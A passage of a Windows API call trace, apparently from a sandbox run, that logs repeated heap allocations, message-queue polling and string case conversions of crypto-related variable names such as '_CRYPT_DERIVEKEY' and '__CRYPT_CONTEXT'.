wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.968] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0189.968] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0189.968] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0189.968] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0189.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0189.968] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0189.968] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2698 [0189.968] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0189.968] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0189.968] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0189.968] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0189.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0189.968] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c27d8 [0189.968] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0189.968] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0189.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0189.969] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd498 [0189.969] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0189.969] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0189.969] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0189.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0189.969] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0189.969] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0189.969] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0189.969] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0189.969] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0189.969] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0189.969] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0189.969] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0189.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0189.969] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0189.969] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0189.969] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0189.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0189.969] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0189.969] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0189.972] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0189.972] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.972] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0189.972] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0189.972] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0189.972] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0189.972] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0189.972] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0189.972] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0189.972] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0189.972] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0189.972] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0189.972] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0189.972] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0189.972] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0189.972] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0189.972] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0189.972] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0189.972] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0189.972] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0189.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0189.973] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0189.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0189.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0189.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0189.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0189.973] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0189.973] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0189.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0189.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0189.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0189.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0189.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0189.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0189.973] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0189.973] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0189.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0189.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0189.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0189.973] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0189.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0189.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0189.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0189.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0189.973] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0189.973] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0189.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0189.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0189.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0189.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0189.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0189.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0189.974] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0189.974] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0189.974] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0189.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0189.974] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0189.974] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0189.974] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0189.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd780 [0189.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0189.974] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0189.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0189.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0189.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0189.974] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0189.974] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.974] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0189.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bdaf8 [0189.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0189.974] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0189.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0189.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0189.974] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0189.975] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0189.975] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0189.975] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0189.975] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0189.975] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0189.975] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0189.975] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0189.975] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0189.975] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0189.975] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0189.975] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0189.975] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0189.975] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0189.975] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0189.975] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0189.975] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.975] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0189.975] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bdaf8 [0189.975] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0189.975] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0189.975] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0189.975] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0189.975] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0189.975] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0189.975] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0189.975] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0189.975] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0189.975] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0189.975] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0189.976] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0189.976] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0189.976] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0189.976] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0189.976] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0189.976] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.976] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0189.976] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.976] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0189.976] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0189.976] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0189.976] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0189.976] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0189.976] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0189.976] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.976] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.976] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0189.976] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bdaf8 [0189.976] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0189.976] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0189.976] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0189.976] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0189.976] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0189.976] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0189.976] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0189.976] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0189.976] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0189.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0189.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0189.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0189.977] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0189.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0189.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0189.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0189.977] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0189.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0189.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0189.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0189.977] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0189.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0189.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0189.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0189.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0189.977] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0189.977] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0189.977] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0189.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd5b8 [0189.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0189.977] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0189.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0189.978] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0189.978] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0189.978] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0189.978] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0189.978] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0189.978] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0189.978] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0189.978] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0189.978] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0189.978] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0189.978] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0189.978] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0189.978] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0189.978] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0189.978] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0189.978] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0189.978] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0189.978] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0189.978] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0189.978] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0189.978] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0189.978] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0189.978] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0189.978] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0189.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0189.979] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0189.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0189.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0189.979] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0189.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0189.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0189.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0189.979] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0189.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0189.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0189.979] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0189.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0189.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0189.979] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0189.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0189.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0189.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0189.979] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0189.979] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0189.979] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0189.979] HeapFree (in: hHeap=0x8a0000, 